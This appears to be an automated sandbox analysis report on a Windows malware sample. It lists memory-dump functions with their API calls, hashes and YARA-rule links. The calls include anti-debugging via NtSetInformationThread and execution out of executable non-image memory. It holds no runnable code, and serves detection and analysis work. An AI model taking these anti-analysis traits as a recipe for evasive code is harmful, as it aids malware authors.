                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 632c4abc123e8d9d2ef745a107ebf2dcb0c8df519bed08917f858f33eb3d1043
                          • Instruction ID: 97ca0a524f11b0eebbec80c6837a6140bd7788880bdb7eb398b66e97d12940d8
                          • Opcode Fuzzy Hash: 632c4abc123e8d9d2ef745a107ebf2dcb0c8df519bed08917f858f33eb3d1043
                          • Instruction Fuzzy Hash: 84A15BD5A2E703C5E49361B100D557154A0EEE73695738BBB6B23728C2A33E529B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D0B1F, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ProcessTerminate
                          • String ID:
                          • API String ID: 560597551-0
                          • Opcode ID: 609e079f7f88a84e2628d75521c171d77fd61638837456c60a2855c9afe620dd
                          • Instruction ID: f832736ddde31c7d48e04b38300a9d2a843b6fb288c484f69b476f1eed99da1c
                          • Opcode Fuzzy Hash: 609e079f7f88a84e2628d75521c171d77fd61638837456c60a2855c9afe620dd
                          • Instruction Fuzzy Hash: 70215C24AC4249FEEF355DA48C997FE2263DF05314FE5411ADC5A960C5D739C486CA13
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403F86, Relevance: 1.6, APIs: 1, Instructions: 344memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: e23636b48c8cdc0ebc32cbfae07d16ebcdfff2afab88762d0e5b80b5edde639c
                          • Instruction ID: 5a7e514a033dc09a51dc62c0d569df3c78be054a9d1873717537272b87d55ccb
                          • Opcode Fuzzy Hash: e23636b48c8cdc0ebc32cbfae07d16ebcdfff2afab88762d0e5b80b5edde639c
                          • Instruction Fuzzy Hash: 3DA15CD5A2E703C5E49361B100D557154A0EEE73595738BBB6B23728C2A33E539B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403FB8, Relevance: 1.6, APIs: 1, Instructions: 337memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 8c306017138aee90278a1c4f4d7e266cad46b7885bb21410c38048aa2de1f4bf
                          • Instruction ID: 8a9a38e5a986b2112afbe06eff999ee214becc5fffbd6516ce678b394f5019b9
                          • Opcode Fuzzy Hash: 8c306017138aee90278a1c4f4d7e266cad46b7885bb21410c38048aa2de1f4bf
                          • Instruction Fuzzy Hash: 4EA14CD5A2E703C5E49361B100D557154A0EEE73695738BBB6B23728C2A33E539B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404010, Relevance: 1.6, APIs: 1, Instructions: 336memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 679eb021945dc48e02a6d9ee1e47cd04f38dce77339139c77769fe5daab80c1b
                          • Instruction ID: a9f807c2adfc3597f0929e0bb572e8fd46c71d67008136cc5dabf4c136a0d211
                          • Opcode Fuzzy Hash: 679eb021945dc48e02a6d9ee1e47cd04f38dce77339139c77769fe5daab80c1b
                          • Instruction Fuzzy Hash: 1FA16CD5A2E703C5E49361B000D547154A0EEE73695738BBB6B33728C2A33E569B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D0B36, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadProcessTerminate
                          • String ID:
                          • API String ID: 3349790660-0
                          • Opcode ID: 54628aad00f9651a6664778c34ce9a57ac459b27f710fa8c1e293ee2f522b005
                          • Instruction ID: 52c63a237a30d307b04f987406ad109404ee39cdf4da73fcf403a5f8f055cfd4
                          • Opcode Fuzzy Hash: 54628aad00f9651a6664778c34ce9a57ac459b27f710fa8c1e293ee2f522b005
                          • Instruction Fuzzy Hash: 9B214C30A84645EEEF355E648C597FE2262EF46310F98411ADC1A46185D7399486CA13
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404037, Relevance: 1.6, APIs: 1, Instructions: 322memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 1b919d448a701644899729f3736553f1daf91e1d783f8941c2fadad6536bb694
                          • Instruction ID: 118277ed928fd5530dcc2647fba53c766a1b991fa1e4da546b58ddb1ca3e0b0c
                          • Opcode Fuzzy Hash: 1b919d448a701644899729f3736553f1daf91e1d783f8941c2fadad6536bb694
                          • Instruction Fuzzy Hash: 4DA13CD5A2E703C6E49361B100D55715090EEE73595B38BBB6B23728C2A33E579B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D0E5B, Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                          Download Yara Rule
                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ProcessTerminate
                          • String ID:
                          • API String ID: 560597551-0
                          • Opcode ID: 2e6bb9eaaf0578f4a4a81cb199bf04f7ab09024cd35b943c594284c59cc6c870
                          • Instruction ID: 83506cf9abadb8c294a9dbfb08b5a3a95a180c2275e11fa7bdc6afd890c50742
                          • Opcode Fuzzy Hash: 2e6bb9eaaf0578f4a4a81cb199bf04f7ab09024cd35b943c594284c59cc6c870
                          • Instruction Fuzzy Hash: F4119E21684385FEE70606788C697FB2B672FD7750FAE424DDC99172C2C32E2046C726
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D46F9, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 911e27cb9a0f2cfa49cd6fc73d4a5da532432d56efd2775ea774ef879642d6e1
                          • Instruction ID: 93018fa0cdd6e2bb681f74087f094d9e87cec1e0477e48c1aba07c55c3c3af30
                          • Opcode Fuzzy Hash: 911e27cb9a0f2cfa49cd6fc73d4a5da532432d56efd2775ea774ef879642d6e1
                          • Instruction Fuzzy Hash: 7D012654AC02DAECEF283AF46D40BF712669F527E0FC8423AECD183045D734C4849A52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004040A3, Relevance: 1.6, APIs: 1, Instructions: 316COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0d674429c047d12088ecf4eded2f66f17feb897414799b0168e0f6c9c073bb1d
                          • Instruction ID: 1fd141ad37f5d3da34ccff4938141f45163ba57e7791371ba99346336ad90758
                          • Opcode Fuzzy Hash: 0d674429c047d12088ecf4eded2f66f17feb897414799b0168e0f6c9c073bb1d
                          • Instruction Fuzzy Hash: 7CA17DD5A2E703C5E49361B001D547150A0EEE73595738BBB6B23728C2A33E539B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004041DC, Relevance: 1.6, APIs: 1, Instructions: 316COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8eb480f910d046d548eaa06b5c917f89573c4de4eb016eea5b9cc643d20cb466
                          • Instruction ID: 8e36c6557172b94cbce5258a68c58c6d75c61831299a078dbf07df5cbb141a78
                          • Opcode Fuzzy Hash: 8eb480f910d046d548eaa06b5c917f89573c4de4eb016eea5b9cc643d20cb466
                          • Instruction Fuzzy Hash: B6918BD5A2E703C6E59361B000D15315090EEE73695738BBB6B23728C2A33E935B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004040C3, Relevance: 1.6, APIs: 1, Instructions: 315memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: f001f8e03d156beebe99ad35caa4b588d4404b200a1d54c0da571056e83cbeb4
                          • Instruction ID: 96c2c8aa07aef860a88bd9ebba14c03295fc72e004141e34ee82a16268a025ea
                          • Opcode Fuzzy Hash: f001f8e03d156beebe99ad35caa4b588d4404b200a1d54c0da571056e83cbeb4
                          • Instruction Fuzzy Hash: 90A13BD5A2E703C6E49361B100D55715090EEE73695738BBB6B23728C2A33E569B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040417C, Relevance: 1.6, APIs: 1, Instructions: 315memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 48cfa42da5f14b678144a09bad492e572f2cbff5feb54f1e1fcc982eeb2ce314
                          • Instruction ID: 8ffdc8a7df0579876b6f33642f5e48dab98dda9a6020dec5a2a003cc8d794a6f
                          • Opcode Fuzzy Hash: 48cfa42da5f14b678144a09bad492e572f2cbff5feb54f1e1fcc982eeb2ce314
                          • Instruction Fuzzy Hash: A0915BD5A2E703C6E49361B100D55715090EEE73695738BBB6B23728C2A33E539B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D0B81, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadProcessTerminate
                          • String ID:
                          • API String ID: 3349790660-0
                          • Opcode ID: 722d70f6be9aaccb737a0401b831b457059217e96d86612c903f7dce459de6fb
                          • Instruction ID: 7a838f34b7fe5b4c045bedc3de1a1998fb59f3f7d8d17e01d8d06cd47210a071
                          • Opcode Fuzzy Hash: 722d70f6be9aaccb737a0401b831b457059217e96d86612c903f7dce459de6fb
                          • Instruction Fuzzy Hash: D8115C30AC4745FEEF356E748C597FE11629F06314FD8425ADC1A860C5D73A808ACA13
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004040D2, Relevance: 1.6, APIs: 1, Instructions: 313memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 7b8d819fc4ed27aed13184bcee3c4d181c49820dc72be7f1dcb90cb09837cd6b
                          • Instruction ID: 7fcb3cd3e340e96c8fb22e370cc06ba3b4393df44cd8fc3f67d57e95ba819dfd
                          • Opcode Fuzzy Hash: 7b8d819fc4ed27aed13184bcee3c4d181c49820dc72be7f1dcb90cb09837cd6b
                          • Instruction Fuzzy Hash: 9DA14BD5A2E703C6E49361B100D55715090EEE73695738BBB6B23728C2A33E579B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D0E91, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                          Download Yara Rule
                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ProcessTerminate
                          • String ID:
                          • API String ID: 560597551-0
                          • Opcode ID: 3396b8d7186a8d13b4ca59f0cd0414451ad1ded6aa947265a6dd13015a1b1261
                          • Instruction ID: 7a7d2f9caa846f82f69ab18d713b1179323603ddbb1e4d47178e599602b0d8c4
                          • Opcode Fuzzy Hash: 3396b8d7186a8d13b4ca59f0cd0414451ad1ded6aa947265a6dd13015a1b1261
                          • Instruction Fuzzy Hash: A8116B21584385BFE7020A288C587FB3BB72FD3754FAA825CEC8D272C1C37E60468656
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040410E, Relevance: 1.6, APIs: 1, Instructions: 304memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 4f036b1b823f31034d993acbbeb74184a996484b433c5b9e801545db13017105
                          • Instruction ID: 0537057e3d371a759d43b9a71a26d6b211f48032a6c7eac067c08a107780058b
                          • Opcode Fuzzy Hash: 4f036b1b823f31034d993acbbeb74184a996484b433c5b9e801545db13017105
                          • Instruction Fuzzy Hash: D8916DD5A2E703C5E49361B000D55715090EEE73595B38BBB6B23728C2A33E579B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404137, Relevance: 1.6, APIs: 1, Instructions: 301memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 49e974a252db238a86c74438d601280ed5224195710d240a6c17d01c8362ae45
                          • Instruction ID: 4023f421f11dc1f5730039cd94b2e85da9494837e3123fed2c3038cbb3c55c75
                          • Opcode Fuzzy Hash: 49e974a252db238a86c74438d601280ed5224195710d240a6c17d01c8362ae45
                          • Instruction Fuzzy Hash: 87917CD5A2E703C6E49361B000D55715090EEE73695738BBB6B23728C2A73E569B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040419A, Relevance: 1.5, APIs: 1, Instructions: 297memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: d870bd68c96b3b6f5acdb83c3ee942eb063f1870f099ff79d5b21681b5afde85
                          • Instruction ID: f7e6c68a7f2683c5506a4479a1447b67c326f909ab7802b6375e13fbc5a9d830
                          • Opcode Fuzzy Hash: d870bd68c96b3b6f5acdb83c3ee942eb063f1870f099ff79d5b21681b5afde85
                          • Instruction Fuzzy Hash: DD915BD5A2E703C6E49361B100D55715090EEE73695738BBB6B23728C2A33E539B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D0BCD, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ProcessTerminate
                          • String ID:
                          • API String ID: 560597551-0
                          • Opcode ID: aa282526f4138e04386bcd8b25e51d4fd5891ca0369f459318522c51605090a5
                          • Instruction ID: 6f483379b5d81fdf3578b8391ea71ac71066e03071f334b190126e669b6be581
                          • Opcode Fuzzy Hash: aa282526f4138e04386bcd8b25e51d4fd5891ca0369f459318522c51605090a5
                          • Instruction Fuzzy Hash: 78017030984749FEEF316E3489583EF26A2AF07314FD94156DC5D46185C73E418DCA13
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D481A, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 20d65bf04497312ab34d871da0edbf0df8b9992d11460c1d504a49d7665bd082
                          • Instruction ID: a27b8b0ede04fd8e51347022caae7103ffdeca67f8e1197f2daf32f2ccf91644
                          • Opcode Fuzzy Hash: 20d65bf04497312ab34d871da0edbf0df8b9992d11460c1d504a49d7665bd082
                          • Instruction Fuzzy Hash: 9AF0F654AC12D9ECEF383AA02C44BFB125A9F453E0FD94622ECD1920418338C4885A57
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D4835, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: dc28bb1de3963915b9ea31155bbfac053098c0a3db357a5a311b3f46ab21e30f
                          • Instruction ID: 1d7db696f28bcc620a3053a3c24f20a3412ad6d03e80b489731d37dc00586bce
                          • Opcode Fuzzy Hash: dc28bb1de3963915b9ea31155bbfac053098c0a3db357a5a311b3f46ab21e30f
                          • Instruction Fuzzy Hash: 3AF0F054AC0288ECEF383AA12D407FB12AA9F04390FD98635EC8196000D738C4844A17
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040425B, Relevance: 1.5, APIs: 1, Instructions: 290memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: ee051ff409b8a2696d985f2160f80edccfa737bf3dc91653fdef87151515602d
                          • Instruction ID: 3a993d0c2fd200322bd0d9bd683fb221090c35edfc71c19415f9c66b33ad79d4
                          • Opcode Fuzzy Hash: ee051ff409b8a2696d985f2160f80edccfa737bf3dc91653fdef87151515602d
                          • Instruction Fuzzy Hash: 278149D5A2E703C6E49361B040D55715090EEE73695738BBB6B23728C2A33E975B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D4877, Relevance: 1.5, APIs: 1, Instructions: 38libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 613cba109c1a56d39a577744a05df1865b4c070179d3a231b56e0551b3355e6e
                          • Instruction ID: 04794e5746724d821e7527830daedff0aa85643557ce91a68a1a218edf398a0c
                          • Opcode Fuzzy Hash: 613cba109c1a56d39a577744a05df1865b4c070179d3a231b56e0551b3355e6e
                          • Instruction Fuzzy Hash: ACF0E544AC0289EDDF383BB55C447EB629B9F093A0FD85626ECD4A6180D738C0850F57
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004041D4, Relevance: 1.5, APIs: 1, Instructions: 287memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 7f7db64d8a08ca27ccd29795d9ac24bca1aead8dd8012ddee22aefa8069205e2
                          • Instruction ID: 322dbcbec4a81d62550938f1936de80c87d3c893e328e8dd7583e68a8e7b333c
                          • Opcode Fuzzy Hash: 7f7db64d8a08ca27ccd29795d9ac24bca1aead8dd8012ddee22aefa8069205e2
                          • Instruction Fuzzy Hash: D3915BD5A2E703C6E49361B140D55715090EEE73695738BBB6B23728C2A33E539B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D0EFD, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                          Download Yara Rule
                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ProcessTerminate
                          • String ID:
                          • API String ID: 560597551-0
                          • Opcode ID: 58d2a7dd2a41f69a1a09ca3a0dd23945772334a2c835f9c173e894c8f62388c5
                          • Instruction ID: b5e6b6ab18b0598662365d273e13e3d4df86457b7363291042fee6c60d0fc93d
                          • Opcode Fuzzy Hash: 58d2a7dd2a41f69a1a09ca3a0dd23945772334a2c835f9c173e894c8f62388c5
                          • Instruction Fuzzy Hash: 57F02E105847857BD7215E2C8C557EB6B562F43714FD94349EC58171C2C77F60558226
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D0C3D, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                          Download Yara Rule
                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ProcessTerminate
                          • String ID:
                          • API String ID: 560597551-0
                          • Opcode ID: 6a2ec12615e2985170c550c41f810840581e50173de29c0b6a90555c36a090c1
                          • Instruction ID: 3439cdbb7a9bb4f2886c641c89061628c4b1f5a375a7d5ed2642d9fe381343df
                          • Opcode Fuzzy Hash: 6a2ec12615e2985170c550c41f810840581e50173de29c0b6a90555c36a090c1
                          • Instruction Fuzzy Hash: 0CF0EC2444C681A9D7135B744865BA67F726F07640FD842DFCC9E47083DB2B808BD757
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D0469, Relevance: 1.5, APIs: 1, Instructions: 29nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • EnumWindows.USER32(021D04A1,?,00000000,00000000,00000040,00000000,?), ref: 021D0481
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
